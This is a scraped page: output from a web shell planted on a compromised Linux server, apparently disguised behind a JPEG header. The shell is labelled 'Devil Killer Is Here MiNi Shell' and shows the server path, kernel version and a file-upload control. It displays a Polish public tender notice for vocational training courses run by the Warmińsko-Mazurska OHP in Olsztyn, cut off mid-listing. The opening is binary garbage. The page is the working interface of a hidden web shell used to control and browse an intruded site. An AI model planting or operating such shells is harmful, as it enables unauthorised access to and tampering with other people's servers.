JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250328/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250328/0016755301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Szkolenia zawodowe dla uczestników projektu pn. „Zainwestuj w przyszłość!”, realizowanego przez Warmińsko-Mazurską Wojewódzką Komendę OHP w Olsztynie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Warmińsko - Mazurska Wojewódzka Komenda OHP w Olsztynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001036891</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Artyleryjska 3B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-165</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@warminsko-mazurska.ohp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.warminsko-mazurska.ohp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Szkolenia zawodowe dla uczestników projektu pn. „Zainwestuj w przyszłość!”, realizowanego przez Warmińsko-Mazurską Wojewódzką Komendę OHP w Olsztynie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8effa92b-ec52-4e5f-966b-69d2cc7a9eae</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00167553</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00120545/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Szkolenia zawodowe, w związku z realizacją projektu pn. „Zainwestuj w przyszłość!” , w ramach Priorytetu 7 Rynek pracy, programu regionalnego Fundusze Europejskie dla Warmii i Mazur 2021-2027</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> . „Zainwestuj w przyszłość!” nr FEWM.07.02-IP.01-0007/24 w ramach Priorytetu 7 Rynek pracy, programu regionalnego Fundusze Europejskie dla Warmii i Mazur 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8effa92b-ec52-4e5f-966b-69d2cc7a9eae <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania konta, zasady i warunki korzystania z Platformy e-Zamówienia określa regulamin dostępny pod adresem: https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu, oraz informacje zamieszczone w zakładce „Centrum Pomocy” – zawierające interaktywne instrukcje. <br/>Przeglądanie dokumentów zamówienia nie wymaga rejestracji ani logowania – dostępne jest dla wszystkich zainteresowanych. <br/>Cała komunikacja w postępowaniu (wnioski o wyjaśnienia SWZ, wnioski o zwrot wadium, inne informacji, odpowiedzi na wezwania Zamawiającego) odbywa się wyłącznie za pośrednictwem Platformy e-Zamówienia. Wysyłanie wiadomości e-mail jest dopuszczalne wyłącznie w sytuacji awarii Platformy e-Zamówienia (jednak nie dotyczy to składania ofert). <br/>Sposób komunikacji opisuje instrukcja: <br/>https://media.ezamowienia.gov.pl/pod/2021/10/Komunikacja-w-postepowaniu-5.1.pdf.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 Mb (wielkość dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>W przypadku problemów technicznych i awarii można skorzystać ze wsparcia technicznego przez formularz udostępniony na stronie Platformy w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem Danych jest Komendant Wojewódzki Warmińsko-Mazurskiej Woje-wódzkiej Komendy Ochotniczych Hufców Pracy z siedzibą przy ul. Artyleryjskiej 3B, 10-165 Olsztyn, tel. 89 527 62 03, adres e-mail: sekretariat@warminsko-mazurska.ohp.pl. <br/>2.	Kontakt do inspektora ochrony danych: iod@warminsko-mazurska.ohp.pl <br/>3.	Administrator może przetwarzać dane:<br/>a.	wykonawców, w tym dostawców oraz potencjalnych dostawców;<br/>b.	wspólników, pracowników, przedstawicieli ustawowych oraz reprezentantów i pełnomocników ww. kontrahentów, w tym osób kontaktowych ujawnionych.<br/>4.	Administrator może przetwarzać dane podane bezpośrednio przez kontrahentów lub osoby występujące w ich imieniu, takie jak:<br/>a.	imię i nazwisko, nazwa wykonawcy, adres prowadzonej działalności oraz inne adresy korespondencyjne;<br/>b.	numery rejestracyjne we właściwych rejestrach;<br/>c.	dane kontaktowe (numer telefonu, adres email);<br/>d.	dane dotyczące statusu w strukturze wykonawcy (np.: funkcja, stanowisko, zakres uprawnień)<br/>e.	dane dotyczące składanej oferty<br/>f.	dane dotyczące kwalifikacji i uprawnień zawodowych.<br/>5.	Ponadto Administrator może, w niezbędnym zakresie podyktowanym potrzebą wery-fikacji potencjalnego wykonawcy, pozyskiwać dodatkowe informacje ze źródeł ogól-nodostępnych, takich jak prowadzone na podstawie przepisów prawa rejestry gospo-darcze i zawodowe (np. CEIDG, KRS).<br/>6.	Zgromadzone dane osobowe, o których mowa w pkt 1 będą przetwarzane na podsta-wie:<br/>a.	zgodnie z art. 6 ust. 1 lit. b) RODO, przetwarzanie jest niezbędne do podjęcia działań przed zawarciem umowy, której stroną jest osoba, której dane dotyczą. Podanie danych koniecznych dla związania umową lub jej realizacji i rozlicze-nia jest obowiązkowe. W tym celu Administrator może przetwarzać dane oso-bowe w okresie archiwizacji na podstawie odrębnych przepisów;<br/>b.	zgodnie z art. 6 ust. 1 lit. c) RODO, gdy przetwarzanie tych danych będzie niezbędne dla realizacji obowiązków wynikających z przepisów prawa tj. prze-prowadzenia postępowania o zamówienie publiczne, do których nie stosuje się przepisów ustawy Prawo zamówień publicznych, na podstawie art. 68 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych oraz wewnętrznego zarządze-nia Administratora danych. Podanie danych jest obowiązkowe, a obowiązek wynika z przepisów prawa oraz obowiązującego zarządzenia. W tym celu może Administrator może przetwarzać dane osobowe w okresie archiwizacji na pod-stawie odrębnych przepisów;<br/>c.	dla realizacji uzasadnionych interesów Administratora zgodnie z art. 6 ust. 1 lit. f) RODO. Takimi uzasadnionymi interesami są np.: prowadzenie bieżącej ko-munikacji; prowadzenie korespondencji w zakresie podejmowanych działań gospodarczych, weryfikacja tożsamości osób działających na zlecenie; ustale-nie, dochodzenie i ochrona roszczeń wynikających z prowadzonej działalności oraz ochrona przed takimi roszczeniami – w czasie uwzględniającym okresy wygaśnięcia poszczególnych roszczeń.<br/>7.	Administrator może ujawnić dane osobowe:<br/>a.	podmiotom i osobom działającym na zlecenie na podstawie zawartych umów powierzenia przetwarzania danych osobowych w zakresie wsparcia prawnego, informatycznego i organizacyjnego,<br/>b.	organom państwowym, na podstawie przepisów prawa w ramach prowadzo-nych postepowań,<br/>c.	podmiotom uprawnionym na podstawie odrębnych przepisów prawa, w tym między innymi na podstawie ustawy o dostępie do informacji publicznej.<br/>8.	Przysługuje prawo dostępu do treści swoich danych, ich sprostowania oraz prawo do ich usunięcia – po okresie archiwizacji, ograniczenia przetwarzania, wniesienia sprze-ciwu oraz prawo do przenoszenia danych – w granicach określonych zgodnie z art. 15-22 RODO.<br/>9.	Przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobo-wych gdy uzna, iż przetwarzanie danych osobowych jest niezgodne z prawem.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WMWK.OHP.ZPSiZP.271.10/ZWP.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">10</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34; Auto detailing z elementami uwzględniającymi zasady zrównoważonego rozwoju&#34;, w wymiarze 45 godzin, w tym:<br/>15h zajęć teoretycznych (45 min.)<br/>30h zajęć praktycznych (60 min.), w jednostce - Hufiec Pracy w Braniewie<br/>ul. Gdańska 19<br/>14-500 Braniewo, dla 4 osób </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34;Auto detailing z elementami uwzględniającymi zasady zrównoważonego rozwoju&#34;, w wymiarze 45h<br/>w tym:<br/>15h zajęć teoretycznych (45 min.)<br/>30h zajęć praktycznych (60 min.), w jednostce - Ośrodek Szkolenia i Wy-chowania OHP w Pasłęku<br/>ul. Westerplatte 20<br/>14-400 Pasłęk, dla 5 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34;Kuchnia polska z elementami uwzględniającymi zasady zrównoważonego rozwoju&#34;, w wymiarze 50h <br/>zajęć teoretyczno-praktycznych (60 min.), w jednostce - Hufiec Pracy w Braniewie<br/>ul. Gdańska 19<br/>14-500 Braniewo, dla 6 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34;Barista z elementami uwzględniającymi zasady zrównoważonego rozwoju&#34;, w wymiarze40h<br/>w tym:<br/>10h zajęć teoretycznych (45 min.)<br/>30h zajęć praktycznych (60 min.), w jednostce - Ośrodek Szkolenia i Wy-chowania OHP w Pasłęku<br/>ul. Westerplatte 20<br/>14-400 Pasłęk, dla 5 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34; Barber I stopnia z elementami uwzględniającymi za-sady zrównoważonego rozwoju&#34;, w wymiarze 60h<br/>w tym:<br/>20h zajęć teoretycznych (45 min.)<br/>40h zajęć praktycznych (60 min.), w jednostce - Hufiec Pracy w Olsztynie<br/>ul. Artyleryjska 3B<br/>10-165 Olsztyn, dla 5 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34; Operator wózków jezdniowych specjalizowanych z elementami uwzględniającymi zasady zrównoważonego rozwoju&#34;, w wymiarze 35h<br/>w tym:<br/>15h zajęć teoretycznych (45 min.)<br/>20h zajęć praktycznych (60 min.), w jednostce - Hufiec Pracy w Olsztynie<br/>ul. Artyleryjska 3B<br/>10-165 Olsztyn, dla 5 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis 